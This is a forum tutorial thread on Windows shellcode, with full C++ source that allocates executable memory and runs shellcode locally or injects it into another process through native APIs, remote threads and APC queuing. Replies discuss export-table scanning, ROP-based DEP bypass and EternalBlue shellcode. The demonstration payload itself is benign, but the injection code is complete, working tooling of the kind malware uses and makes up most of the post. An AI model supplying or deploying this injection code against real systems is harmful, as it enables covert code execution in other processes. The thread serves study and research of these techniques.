Tutorial Shellcode execution (C++ & ASM)

Deleted member 65228

Guest
#1
Introduction

Shell-code is a sequence of machine instructions: the byte representation of Assembly instructions such as MOV, CALL, JMP, PUSH, POP and RET. You can take the bytes of a function from its disassembly and use them as shell-code. However, if the bytes are handled as a C string they must be free of null bytes (0x00), because string functions such as strlen stop at the first one. Any addresses they contain must also be valid in the process that runs them (a hard-coded address might cause a problem, and will probably not work on another system either).

For example, suppose we have a few Assembly instructions that we wish to turn into shell-code.



Code:
MOV EAX, 0x4D2
JMP EAX
To get the bytes, we need to check the disassembly, for example in a debugger or with a disassembler.

The bytes for those two instructions are the following.



Code:
B8 D2 04 00 00
FF E0
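These bytes can be stored in a byte array. Note that this particular encoding contains two null bytes (0x00), so it is fine in a byte array with an explicit length but would be cut short if it were treated as a C string.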



Code:
unsigned char Opcode[7] = {
        0xB8, 0xD2, 0x04, 0x00, 0x00,
        0xFF, 0xE0
    };
You can keep your instructions in a byte array, or you can use a string instead. In string form, each byte is written as an escape sequence: a backslash, then an 'x', then the two hexadecimal digits of the byte.

For example, to convert MOV EAX to shell-code, we use the opcode B8 (0xB8), which is MOV EAX with a 32-bit immediate value. In shell-code string form:
Code:
"\xb8"
If we have the address of a function, let's say ExitProcess at 0x77513cb0, and we wish to store it in EAX, then the following would be an example:
Code:
"\xb8\xb0\x3c\x51\x77"
Notice how there are no null bytes? You may also notice that the address looks odd: its bytes are in reverse order!
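To see why null bytes matter once shell-code is kept in string form, here is a minimal sketch in standard C++ (nothing Windows-specific). It holds the two byte sequences used in this post so that the length reported by strlen can be compared with the real size of each array. The names kWithNulls, kNullFree and containsNullByte are made up for this illustration.

```cpp
#include <cstddef>
#include <cstring>

// MOV EAX, 0x4D2 / JMP EAX: the immediate value contains two 0x00 bytes.
const char kWithNulls[] = "\xb8\xd2\x04\x00\x00\xff\xe0";

// MOV EAX, 0x77513cb0 / JMP EAX: no 0x00 bytes anywhere.
const char kNullFree[] = "\xb8\xb0\x3c\x51\x77\xff\xe0";

// Hypothetical helper: returns true if any of the first `size` bytes is 0x00.
bool containsNullByte(const char* bytes, std::size_t size) {
    for (std::size_t i = 0; i < size; ++i) {
        if (bytes[i] == '\0') {
            return true;
        }
    }
    return false;
}

// Length as strlen sees it: counting stops at the first 0x00 byte.
std::size_t lengthSeenByStrlen(const char* bytes) {
    return std::strlen(bytes);
}
```

With these definitions, lengthSeenByStrlen(kWithNulls) is 3 although the array holds 7 bytes of code (sizeof(kWithNulls) - 1), while lengthSeenByStrlen(kNullFree) is 7. Any routine that measures shell-code with strlen would therefore copy only the first three bytes of the first sequence.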

x86 is little-endian, so a multi-byte value such as an address is stored with its least significant byte first. In shell-code, the bytes of an address therefore appear reversed. Reading the address 0x77513cb0 from its end, we get b0, then 3c, 51 and 77 (instead of reading it normally with 77 first, then 51, 3c and b0). It therefore ends up as "\xb0\x3c\x51\x77" instead of "\x77\x51\x3c\xb0".
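The byte order described above can be reproduced with a few shifts. The following is a small sketch in standard C++, not part of the original source code; encodeMovEax and toEscapedString are hypothetical helper names. It builds the five bytes of MOV EAX with a 32-bit value (opcode 0xB8 followed by the value, least significant byte first) and formats them in the "\x" string notation used in this post.

```cpp
#include <array>
#include <cstdint>
#include <string>

// Encode MOV EAX, imm32: opcode 0xB8, then the value in little-endian order.
std::array<std::uint8_t, 5> encodeMovEax(std::uint32_t value) {
    return {{
        0xB8,
        static_cast<std::uint8_t>(value & 0xFF),          // lowest byte first
        static_cast<std::uint8_t>((value >> 8) & 0xFF),
        static_cast<std::uint8_t>((value >> 16) & 0xFF),
        static_cast<std::uint8_t>((value >> 24) & 0xFF),  // highest byte last
    }};
}

// Format the bytes as text such as \xb8\xb0..., for pasting into a string literal.
std::string toEscapedString(const std::array<std::uint8_t, 5>& bytes) {
    static const char* kHex = "0123456789abcdef";
    std::string out;
    for (std::uint8_t b : bytes) {
        out += "\\x";
        out += kHex[b >> 4];
        out += kHex[b & 0x0F];
    }
    return out;
}
```

For the example address, toEscapedString(encodeMovEax(0x77513cb0)) yields the text \xb8\xb0\x3c\x51\x77, which matches the string shown earlier. For 0x4D2 the same function produces B8 D2 04 00 00, the byte sequence from the first example.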


Source code example

I decided to share a basic method of shell-code execution/injection. The demonstration shell-code does nothing useful on your system: it moves an address into EAX and then does a JMP to EAX (the address put into it). The address is hard-coded and therefore will not be valid on your system, so if you run the demonstration shell-code you should end up with a crash.

Execution method:
- Allocates memory for the shell-code with PAGE_EXECUTE_READWRITE flags
- Copies the shell-code to the allocated memory
- Executes the instructions at the address of the allocated memory (the shell-code)

Injection method:
- Allocate memory for the shell-code in the target process using the process handle
- Write to the allocated memory to place the shell-code there (the instructions)
- Execute the shell-code via APC (Asynchronous Procedure Calls)

The demonstration example relies on the Native API functions: NtAllocateVirtualMemory, NtWriteVirtualMemory, NtQueueApcThread, etc. Just to be clear, this is not essential... You can use the normal Win32 API if you'd like.

header.h



Code:
#pragma once
#include <Windows.h>
#include <winternl.h>
#include <TlHelp32.h>
#include <iostream>
#include "ntinfo.h"
#include "memory.h"
#include "shellcode.h"
memory.h



Code:
#pragma once
#include "header.h"

extern pNtOpenThread fNtOpenThread;
extern pNtSuspendThread fNtSuspendThread;
extern pNtResumeThread fNtResumeThread;
extern pNtAllocateVirtualMemory fNtAllocateVirtualMemory;
extern pNtWriteVirtualMemory fNtWriteVirtualMemory;
extern pRtlCreateUserThread fRtlCreateUserThread;
extern pNtQueueApcThread fNtQueueApcThread;

BOOL CreateMemory();
ntinfo.h





Code:
#pragma once
#include "header.h"

#define STATUS_SUCCESS 0x00000000
#define NtCurrentProcess() ((HANDLE)-1)

typedef struct _CLIENT_ID {
    PVOID UniqueProcess;
    PVOID UniqueThread;
}CLIENT_ID, *PCLIENT_ID;

typedef NTSTATUS(NTAPI *pNtOpenProcess)(
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    PCLIENT_ID ClientId
    );

typedef NTSTATUS(NTAPI *pNtOpenThread)(
    PHANDLE ThreadHandle,
    ACCESS_MASK AccessMask,
    POBJECT_ATTRIBUTES ObjectAttributes,
    PCLIENT_ID ClientId
    );

typedef NTSTATUS(NTAPI *pNtSuspendThread)(
    HANDLE ThreadHandle,
    PULONG SuspendCount
    );

typedef NTSTATUS(NTAPI *pNtResumeThread)(
    HANDLE ThreadHandle,
    PULONG SuspendCount OPTIONAL
    );

typedef NTSTATUS(NTAPI *pNtAllocateVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
    );

typedef NTSTATUS(NTAPI *pNtWriteVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID BaseAddress,
    PVOID Buffer,
    SIZE_T NumberOfBytesToWrite,
    PSIZE_T NumberOfBytesWritten
    );

typedef NTSTATUS(NTAPI *pRtlCreateUserThread)(
    HANDLE ProcessHandle,
    PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
    BOOLEAN CreateSuspended,
    ULONG StackZeroBits,
    PULONG StackReserved,
    PULONG StackCommit,
    PVOID StartAddress,
    PVOID StartParameter OPTIONAL,
    PHANDLE ThreadHandle,
    PCLIENT_ID ClientID
    );

typedef NTSTATUS(NTAPI *pNtQueueApcThread)(
    HANDLE ThreadHandle,
    PIO_APC_ROUTINE ApcRoutine,
    PVOID ApcRoutineContext OPTIONAL,
    PIO_STATUS_BLOCK ApcStatusBlock OPTIONAL,
    ULONG ApcReserved OPTIONAL
    );
shellcode.h



Code:
#pragma once
#include "header.h"

BOOL InjectShellcode(
    HANDLE ProcessHandle,
    CHAR *Opcode,
    BOOL bApcInjection
);

BOOL ExecuteShellcodeLocal(
    CHAR *Opcode
);
main.cpp



Code:
#include "header.h"
using namespace std;

int main()
{

    // Use an array: a string literal cannot be assigned to a non-const char* in standard C++.
    char OpcodeBytes[] = "\xb8\xb0\x3c\x51\x77"
        "\xff\xe0";

    if (CreateMemory())
    {
        ExecuteShellcodeLocal(OpcodeBytes);
    }

    return 0;
}
memory.cpp



Code:
#include "header.h"

pNtOpenThread fNtOpenThread;
pNtSuspendThread fNtSuspendThread;
pNtResumeThread fNtResumeThread;
pNtAllocateVirtualMemory fNtAllocateVirtualMemory;
pNtWriteVirtualMemory fNtWriteVirtualMemory;
pRtlCreateUserThread fRtlCreateUserThread;
pNtQueueApcThread fNtQueueApcThread;

BOOL CreateMemory()
{
    // Look up ntdll.dll once; the explicit ANSI variant also compiles in UNICODE builds.
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (!hNtdll)
    {
        return FALSE;
    }

    FARPROC fpNtAddresses[7] = {
        GetProcAddress(hNtdll, "NtOpenThread"),
        GetProcAddress(hNtdll, "NtSuspendThread"),
        GetProcAddress(hNtdll, "NtResumeThread"),
        GetProcAddress(hNtdll, "NtAllocateVirtualMemory"),
        GetProcAddress(hNtdll, "NtWriteVirtualMemory"),
        GetProcAddress(hNtdll, "RtlCreateUserThread"),
        GetProcAddress(hNtdll, "NtQueueApcThread")
    };

    for (FARPROC &fpNtAddress : fpNtAddresses)
    {
        if (!fpNtAddress)
        {
            return FALSE;
        }
    }

    fNtOpenThread = (pNtOpenThread)fpNtAddresses[0];
    fNtSuspendThread = (pNtSuspendThread)fpNtAddresses[1];
    fNtResumeThread = (pNtResumeThread)fpNtAddresses[2];
    fNtAllocateVirtualMemory = (pNtAllocateVirtualMemory)fpNtAddresses[3];
    fNtWriteVirtualMemory = (pNtWriteVirtualMemory)fpNtAddresses[4];
    fRtlCreateUserThread = (pRtlCreateUserThread)fpNtAddresses[5];
    fNtQueueApcThread = (pNtQueueApcThread)fpNtAddresses[6];

    if (!fNtOpenThread ||
        !fNtSuspendThread ||
        !fNtResumeThread ||
        !fNtAllocateVirtualMemory ||
        !fNtWriteVirtualMemory ||
        !fRtlCreateUserThread ||
        !fNtQueueApcThread)
    {
        return FALSE;
    }

    return TRUE;
}
shellcode.cpp







Code:
#include "header.h"

BOOL InjectShellcode(
    HANDLE ProcessHandle,
    CHAR *Opcode,
    BOOL bApcInjection
)
{
    NTSTATUS NtStatus = STATUS_SUCCESS;
    HANDLE ThreadHandle = 0, ThreadHandle32 = 0;
    THREADENTRY32 ThreadEntry32 = { 0 };
    DWORD dwProcessId = GetProcessId(ProcessHandle);
    PVOID pvShellcodeMemory = 0;
    // strlen stops at the first 0x00 byte, so the shell-code must be null-free.
    SIZE_T sOpcodeSize = Opcode ? strlen(Opcode) : 0;
    // NtAllocateVirtualMemory rounds the region size up to a page boundary on
    // return, so keep it separate from the number of bytes to write.
    SIZE_T sRegionSize = sOpcodeSize;
    OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
    CLIENT_ID ClientId{ 0 };
    INT ThreadIndex = 0;

    if (!ProcessHandle || !dwProcessId || !sOpcodeSize)
    {
        return FALSE;
    }

    NtStatus = fNtAllocateVirtualMemory(ProcessHandle, &pvShellcodeMemory, 0, &sRegionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!NT_SUCCESS(NtStatus) || !pvShellcodeMemory)
    {
        return FALSE;
    }

    NtStatus = fNtWriteVirtualMemory(ProcessHandle, pvShellcodeMemory, Opcode, sOpcodeSize, NULL);
    if (!NT_SUCCESS(NtStatus))
    {
        // With MEM_RELEASE the size argument must be 0.
        VirtualFreeEx(ProcessHandle, pvShellcodeMemory, 0, MEM_RELEASE);
        return FALSE;
    }

    if (!bApcInjection)
    {
        NtStatus = fRtlCreateUserThread(ProcessHandle, NULL, FALSE, 0, NULL, NULL, pvShellcodeMemory, NULL, &ThreadHandle, &ClientId);
        if (!NT_SUCCESS(NtStatus))
        {
            // No thread handle was returned, so there is nothing to close here.
            VirtualFreeEx(ProcessHandle, pvShellcodeMemory, 0, MEM_RELEASE);
            return FALSE;
        }

        CloseHandle(ThreadHandle);
    }
    else
    {
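        InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
        ClientId.UniqueProcess = (PVOID)(ULONG_PTR)dwProcessId;

        ThreadHandle32 = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
        if (ThreadHandle32 == INVALID_HANDLE_VALUE)
        {
            VirtualFreeEx(ProcessHandle, pvShellcodeMemory, 0, MEM_RELEASE);
            return FALSE;
        }

        ThreadEntry32.dwSize = sizeof(THREADENTRY32);

        // Thread32First must be called before Thread32Next to fetch the first entry.
        if (Thread32First(ThreadHandle32, &ThreadEntry32))
        {
            do {
                if (ThreadEntry32.th32OwnerProcessID == dwProcessId)
                {
                    ClientId.UniqueThread = (PVOID)(ULONG_PTR)ThreadEntry32.th32ThreadID;

                    NtStatus = fNtOpenThread(&ThreadHandle, MAXIMUM_ALLOWED, &ObjectAttributes, &ClientId);
                    if (NT_SUCCESS(NtStatus))
                    {
                        NtStatus = fNtQueueApcThread(ThreadHandle, (PIO_APC_ROUTINE)pvShellcodeMemory, NULL, NULL, 0);
                        if (NT_SUCCESS(NtStatus))
                        {
                            ThreadIndex++;
                        }

                        // Close the handle only when NtOpenThread actually returned one.
                        CloseHandle(ThreadHandle);
                        ThreadHandle = 0;
                    }
                }
            } while (Thread32Next(ThreadHandle32, &ThreadEntry32));
        }

        CloseHandle(ThreadHandle32);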

        if (!ThreadIndex)
        {
            VirtualFreeEx(ProcessHandle, pvShellcodeMemory, 0, MEM_RELEASE);
            return FALSE;
        }
    }

    return TRUE;
}

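BOOL ExecuteShellcodeLocal(
    CHAR *Opcode
)
{
    NTSTATUS NtStatus = STATUS_SUCCESS;
    PVOID pvShellcodeMemory = 0;
    // strlen stops at the first 0x00 byte, so the shell-code must be null-free.
    SIZE_T sOpcodeSize = Opcode ? strlen(Opcode) : 0;
    // NtAllocateVirtualMemory rounds the region size up to a page boundary on
    // return, so keep it separate from the number of bytes to copy.
    SIZE_T sRegionSize = sOpcodeSize;

    // Reject empty input (or input that starts with 0x00) before allocating anything.
    if (!sOpcodeSize)
    {
        return FALSE;
    }

    NtStatus = fNtAllocateVirtualMemory(NtCurrentProcess(), &pvShellcodeMemory, 0, &sRegionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!NT_SUCCESS(NtStatus) || !pvShellcodeMemory)
    {
        // Nothing was allocated, so there is nothing to free.
        return FALSE;
    }

    RtlCopyMemory(pvShellcodeMemory, Opcode, sOpcodeSize);

    // Call the copied bytes as a function that takes no arguments.
    ((void(*)())pvShellcodeMemory)();

    return TRUE;
}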


This is not meant to be a tutorial on how to understand shell-code or how to create it, so to make use of this you'll need to study further. It is just a share of a simple way to execute shell-code locally or inject it into another process for research purposes.



Thanks for reading as always.
- Opcode




#2
As far as I have seen, shellcodes parse the PEB to find kernel32.dll (or kernelbase.dll), get GetProcAddress and LoadLibrary from it, and after that they have everything they need... blah blah blah.
Why do we need to look up GetProcAddress through the PEB?
Why not just get the addresses of GetProcAddress and LoadLibrary in our injector and then hard-code them inside the shellcode?
Am I right?
In another tutorial you took the LoadLibrary address from the injector and executed it inside another process (DLL injection). If the same functions have the same addresses in different processes, why does shellcode parse the PEB? (Assuming it is injected by some kind of injector, i.e. a PE file.)


And one more bonus question :) Why are these addresses not randomized?
 
Deleted member 65228

Guest
#3
You don't need to find the address of GetProcAddress (KERNEL32) at all. You can keep scanning the Export Address Table (EAT) for the addresses, which is better anyway IMO. You don't get the functions from the PEB itself either (unless it is related to WOW64). Well, kind of: you use the PEB to find the loaded modules (a GetModuleHandle replacement that scans the module list), and then pass the base address of the module you found to the EAT scan to find the addresses of the target functions.

If you are performing injection from already-executing code, then you can find the addresses within your own process and put them into the shell-code dynamically prior to injection. That would work, yes. However, you need to remember that addresses differ between 32-bit and 64-bit modules, which is why the LoadLibrary injection method doesn't work against 32-bit processes from a 64-bit injector by default (even though 64-bit processes can properly access 32-bit processes). The workaround is to find the address in the module of the same architecture as the one the target is using. So if you get the addresses within a 64-bit process, they won't work for a 32-bit process unless you obtain the right addresses for the 32-bit target... if that makes sense.

Remote Code Execution exploits (the kind you meet in shell-code analysis) commonly use ROP chains to force a program into calling a function like NtProtectVirtualMemory, which changes the protection of a memory region (e.g. to PAGE_EXECUTE_READWRITE) for DEP bypass and what-not. Alternatively, they find a way to allocate memory with NtAllocateVirtualMemory as PAGE_EXECUTE_READWRITE so that new code can be copied across, and similar (complex stuff). Dynamically hard-coding the retrieved addresses won't work in a file-less attack like that, because no code runs on the target before exploitation to retrieve them. That is why scanning the EAT is common. Shell-code isn't linked to an IAT, so you cannot call a function whose address you have not found yourself. Scanning the EAT is therefore the best way, and if the module that holds the target function isn't loaded, find the address of LdrLoadDll and use it.

So if you look at EternalBlue/DoublePulsar, the shell-code executed on the targeted host scans the exports of ntoskrnl.exe for NtAllocateVirtualMemory and ExAllocatePool/WithTag. The addresses couldn't be found beforehand and put into the shell-code before the injection, of course, so the shell-code scanned the exports of ntoskrnl.exe to find the functions when it was executed.

The thing is, ntdll.dll is loaded in every single user-mode process. So you are always safe finding addresses within NTDLL and using those functions, as long as the function isn't one that is only available in the WOW64 NTDLL (SysWOW64 version) or alike. So go for LdrGetProcedureAddress instead of GetProcAddress, although there is no need if you are finding addresses through the EAT, because you can just keep scanning the EAT for all of them. To load a module that contains a function you need when it is not loaded yet, use LdrLoadDll.

About the addresses being the same: Windows modules like kernel32.dll, ntdll.dll, user32.dll, etc. are randomised at boot. If you reboot your PC, debug your test program again and compare the addresses, they won't be the same as they are now in the image you attached. But they will stay that way until the next reboot. So the 32-bit kernel32.dll keeps the same address in every 32-bit process, and the 64-bit kernel32.dll keeps the same address in every 64-bit process, until the reboot.

Windows modules are also loaded in a certain order, which is probably the reason why. They get randomised at boot and then stay that way until the next boot. ntdll.dll is always the first module loaded, because the Win32 API depends on NTDLL to transition from ring 3 to ring 0 (ntoskrnl.exe routines are eventually called for NT calls, of course), and after that there is an order for kernel32.dll, user32.dll and other Windows modules. This should depend on the OS version/SP as well.
 